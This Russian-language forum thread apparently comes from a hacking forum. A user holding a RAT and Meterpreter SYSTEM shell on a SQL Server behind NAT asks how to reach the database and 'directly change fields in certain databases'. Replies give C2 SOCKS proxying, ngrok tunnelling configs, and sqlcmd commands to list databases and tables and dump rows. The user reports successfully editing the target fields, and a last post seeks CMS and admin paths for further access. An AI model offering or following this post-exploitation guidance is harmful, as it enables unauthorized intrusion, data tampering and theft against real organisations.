Sql Server за НАТом

[doctordradd]

Есть SQL Server с включённым удаленным подключением и открытым портом 1433, но находится в локальной сети за НАТом
Платформа Windows
Sqlcmd выдаёт ошибку named pipes,не может найти сервер
Как подключиться к нему удаленно?

 

[CCod]

Если ты подключаешь из глобальной сети то никак.Если у тебя есть доступ в сеть(прокси,впн,портфорвардинг),то proxychains sqlcmd ...

 

[doctordradd]

Если у тебя есть доступ в сеть(прокси,впн,портфорвардинг),то proxychains sqlcmd ...

Можно поподробнее?
Доступ пока только к самому серверу
На самом нужном компе пробовал установить ngrok, но не появился в панели

 

[CCod]

Можно поподробнее?
Доступ пока только к самому серверу
На самом нужном компе пробовал установить ngrok, но не появился в панели

прокинь сокс прокси(есть в любом C2) и потом через проксичейн подключайся.И подключайся через tcp (sqlcmd -S tcp:127.0.0.1,1433)

 

[doctordradd]

И подключайся через tcp (sqlcmd -S tcp:127.0.0.1,1433)

Предположительно подключается, но после отправки запроса висит в пустоте,без ответа, в процессах появляется sqlcmd, т.е. ответ не приходит на мой шелл, а в новом окне на самом сервере
Как увидеть ответ в своей консоли?
Либо выполнить query одной командой...

 

[IIIIXX]

Предположительно подключается, но после отправки запроса висит в пустоте,без ответа, в процессах появляется sqlcmd, т.е. ответ не приходит на мой шелл, а в новом окне на самом сервере
Как увидеть ответ в своей консоли?
Либо выполнить query одной командой...

Ты на mssql сервере ? есть локально доступ к цмд ?
если да и да, то

# выводим базы с локального сервера
sqlcmd.exe -S localhost,1433 -E -Q "SELECT name FROM [master].dbo.[sysdatabases];" 
# выводим базы с удаленного сервера
sqlcmd.exe -S HOSTNAMEorIP,1433 -E -Q "SELECT name FROM [master].dbo.[sysdatabases];" 
# вместо сокета можно использовать инстанс name
sqlcmd.exe -S HOSTNAMEorIP\INSTANCE -E -Q "SELECT name FROM [master].dbo.[sysdatabases];"

Для этого тебе надо иметь доступ в локальную сеть и видеть целевой сервак
Нгрок ты как прокидывал ? конфиг такой был?

authtoken: токен
version: 2
tunnels:
    default:
        proto: tcp
        addr: 1433

чтобы увидеть вывод нгрока в консоли запусти так

ngrok.exe start --all --region us --config="C:\Users\Administrator\config.yml"

 

[doctordradd]

конфиг такой был?

Да

чтобы увидеть вывод нгрока в консоли запусти так

Так и запускал, то же, что и с sqlcmd - вижу там в процессах, но здесь ничего в консоли

Ты на mssql сервере ?

Да

есть локально доступ к цмд ?

Нет,только удалённый
Подключение через РАТ+метерпретер-реверс с правами системы, ipconfig показывает айпи типа 10.0.0.0
Цель - прямое изменение полей в определенных базах

sqlcmd.exe -S localhost,1433 -E -Q

Да!!!
Получил ответ в свою консоль!
Как подключиться и работать с определённой базой?

 

[doctordradd]

если да и да, то

Огромное спасибо!
Дело было в tcp: изначально, сейчас изменив тип доступа на юзера, позволяет редактировать нужные поля!

 

[IIIIXX]

Да


Так и запускал, то же, что и с sqlcmd - вижу там в процессах, но здесь ничего в консоли


Да

Нет,только удалённый
Подключение через РАТ+метерпретер-реверс с правами системы, ipconfig показывает айпи типа 10.0.0.0
Цель - прямое изменение полей в определенных базах


Да!!!
Получил ответ в свою консоль!
Как подключиться и работать с определённой базой?

как то так

# 1. Выводим все базы на сервере
sqlcmd.exe -S localhost,1433 -E -Q "SELECT name FROM [master].dbo.[sysdatabases];"

# 2. Вывод всех таблиц с конкретной базы вместо %databasename% указываем имя нужной базы
sqlcmd.exe -S localhost,1433 -E -Q "use [%databasename%]; exec sp_tables" -W

# 3. выгрузка первых 10 полей с конкретной таблицы конкретной базы данных
sqlcmd.exe -S localhost,1433 -E -Q "use [%databasename%]; select top 10 * from [tablename]" -W

 

[prox]

А где то может в БД SQL Server скрываться пути , до CMS, админки или списка доменов....
Ситуация - доступ к SQL Server есть, в локалке по портам не вижу коннект, в браузерах юзеров тоже тишина..